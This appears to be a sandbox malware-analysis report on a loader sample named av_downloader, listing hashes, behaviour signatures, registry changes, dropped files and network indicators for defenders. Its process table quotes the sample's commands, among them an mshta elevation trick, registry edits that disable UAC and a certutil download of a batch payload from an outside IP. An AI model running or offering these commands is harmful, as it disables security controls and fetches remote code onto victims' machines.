| File name: | av_downloader.zip |
| Full analysis: | https://app.any.run/tasks/49e3fa80-52fa-4c0c-a74a-2e5af31e4d94 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | June 02, 2024, 23:20:51 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 29BC26A92B9962B1749A53E6D738D935 |
| SHA1: | 7E1800BF3B3121AD3E00EE7353A961AFB0F5E93E |
| SHA256: | DC14F86578557B858466821AB858840705A05FFCDB391390DE2A63DCF216970E |
| SSDEEP: | 768:slkqfpcAA309D8VwbUfUsyS9uZ4SnOhRqf5wTpKbDMgxZrTzBm2c3GUoLA:syecAd9DbsQpOa5sEMcrTzI9GUoLA |
MALICIOUS
Drops the executable file immediately after the start
- WinRAR.exe (PID: 3984)
Starts CertUtil for downloading files
- cmd.exe (PID: 1824)
UAC/LUA settings modification
- reg.exe (PID: 1548)
Uses Task Scheduler to autorun other applications
- cmd.exe (PID: 1824)
SUSPICIOUS
Starts CMD.EXE for commands execution
- av_downloader.exe (PID: 1604)
- av_downloader.exe (PID: 1796)
Runs shell command (SCRIPT)
- mshta.exe (PID: 1284)
Uses REG/REGEDIT.EXE to modify registry
- cmd.exe (PID: 1824)
Process requests binary or script from the Internet
- certutil.exe (PID: 2232)
Connects to unusual port
- certutil.exe (PID: 2232)
Uses ATTRIB.EXE to modify file attributes
- cmd.exe (PID: 1824)
Reads the Internet Settings
- certutil.exe (PID: 2232)
- certutil.exe (PID: 1900)
- mshta.exe (PID: 1284)
Uses TIMEOUT.EXE to delay execution
- cmd.exe (PID: 1824)
Executing commands from a ".bat" file
- av_downloader.exe (PID: 1604)
- av_downloader.exe (PID: 1796)
INFO
Manual execution by a user
- av_downloader.exe (PID: 1604)
- wmpnscfg.exe (PID: 2172)
Executable content was dropped or overwritten
- WinRAR.exe (PID: 3984)
Create files in a temporary directory
- av_downloader.exe (PID: 1604)
- av_downloader.exe (PID: 1796)
Reads Internet Explorer settings
- mshta.exe (PID: 1284)
Checks supported languages
- wmpnscfg.exe (PID: 2172)
- av_downloader.exe (PID: 1796)
- av_downloader.exe (PID: 1604)
Reads the computer name
- wmpnscfg.exe (PID: 2172)
Creates files or folders in the user directory
- certutil.exe (PID: 2232)
Checks proxy server information
- certutil.exe (PID: 2232)
Reads security settings of Internet Explorer
- certutil.exe (PID: 2232)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | - |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2024:06:02 18:19:30 |
| ZipCRC: | 0x6c49b36a |
| ZipCompressedSize: | 50203 |
| ZipUncompressedSize: | 92160 |
| ZipFileName: | av_downloader.exe |
Total processes
55
Monitored processes
15
Malicious processes
5
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1080 | "C:\Windows\system32\cmd" /c "C:\Users\admin\AppData\Local\Temp\5F58.tmp\5F59.tmp\5F5A.bat C:\Users\admin\Desktop\av_downloader.exe" | C:\Windows\System32\cmd.exe | — | av_downloader.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1284 | mshta vbscript:createobject("shell.application").shellexecute("C:\Users\admin\Desktop\AV_DOW~1.EXE","goto :target","","runas",1)(window.close) | C:\Windows\System32\mshta.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 1548 | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1604 | "C:\Users\admin\Desktop\av_downloader.exe" | C:\Users\admin\Desktop\av_downloader.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 1788 | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1796 | "C:\Users\admin\Desktop\AV_DOW~1.EXE" goto :target | C:\Users\admin\Desktop\av_downloader.exe | — | mshta.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 1824 | "C:\Windows\system32\cmd" /c "C:\Users\admin\AppData\Local\Temp\61AA.tmp\61BA.tmp\61BB.bat C:\Users\admin\Desktop\AV_DOW~1.EXE goto :target" | C:\Windows\System32\cmd.exe | av_downloader.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1900 | certutil -urlcache * delete | C:\Windows\System32\certutil.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: CertUtil.exe Exit code: 2147942659 Version: 6.1.7601.18151 (win7sp1_gdr.130512-1533) Modules
| |||||||||||||||
| 2172 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2232 | certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat | C:\Windows\System32\certutil.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: CertUtil.exe Exit code: 2147942403 Version: 6.1.7601.18151 (win7sp1_gdr.130512-1533) Modules
| |||||||||||||||
Total events
4 739
Read events
4 674
Write events
59
Delete events
6
Modification events
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\av_downloader.zip | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
Executable files
1
Suspicious files
1
Text files
4
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2232 | certutil.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\dr[1].bat | text | |
MD5:CE802B6E8ADD0C59B4C1CEEA614BAFA3 | SHA256:419010826148482CCA4AD662FDBDC8EAC445B4B6181E4A1F4B62D7EB7783F4E2 | |||
| 2232 | certutil.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D91B1967EF3D6973EA9AE658EC3C1C5D | text | |
MD5:CE802B6E8ADD0C59B4C1CEEA614BAFA3 | SHA256:419010826148482CCA4AD662FDBDC8EAC445B4B6181E4A1F4B62D7EB7783F4E2 | |||
| 1796 | av_downloader.exe | C:\Users\admin\AppData\Local\Temp\61AA.tmp\61BA.tmp\61BB.bat | text | |
MD5:DB5421114F689CFB1C82EDF49FDDD7A4 | SHA256:EDB8E629E2C5AE4498D0F00CB4540F185CF6136BA11898A542D2FDD34394379A | |||
| 1604 | av_downloader.exe | C:\Users\admin\AppData\Local\Temp\5F58.tmp\5F59.tmp\5F5A.bat | text | |
MD5:DB5421114F689CFB1C82EDF49FDDD7A4 | SHA256:EDB8E629E2C5AE4498D0F00CB4540F185CF6136BA11898A542D2FDD34394379A | |||
| 3984 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3984.27314\av_downloader.exe | executable | |
MD5:8AF4F985862C71682E796DCC912F27DC | SHA256:D925204430FFAB51FFBBB9DC90BC224B04F0C2196769850695512245A886BE06 | |||
| 2232 | certutil.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D91B1967EF3D6973EA9AE658EC3C1C5D | binary | |
MD5:133BCEC3330F9AB582E07C64549604AB | SHA256:C8252A8B39EE225B3B267E8506B78D88B0F6FBFE4779D7EEF9F398312A1A16A4 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
7
DNS requests
0
Threats
3
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2232 | certutil.exe | GET | 200 | 206.217.142.166:1234 | http://206.217.142.166:1234/windows/dr/dr.bat | unknown | — | — | unknown |
2232 | certutil.exe | GET | 200 | 206.217.142.166:1234 | http://206.217.142.166:1234/windows/dr/dr.bat | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2232 | certutil.exe | 206.217.142.166:1234 | — | AS-COLOCROSSING | US | unknown |
DNS requests
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |
— | — | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |
1 ETPRO signatures available at the full report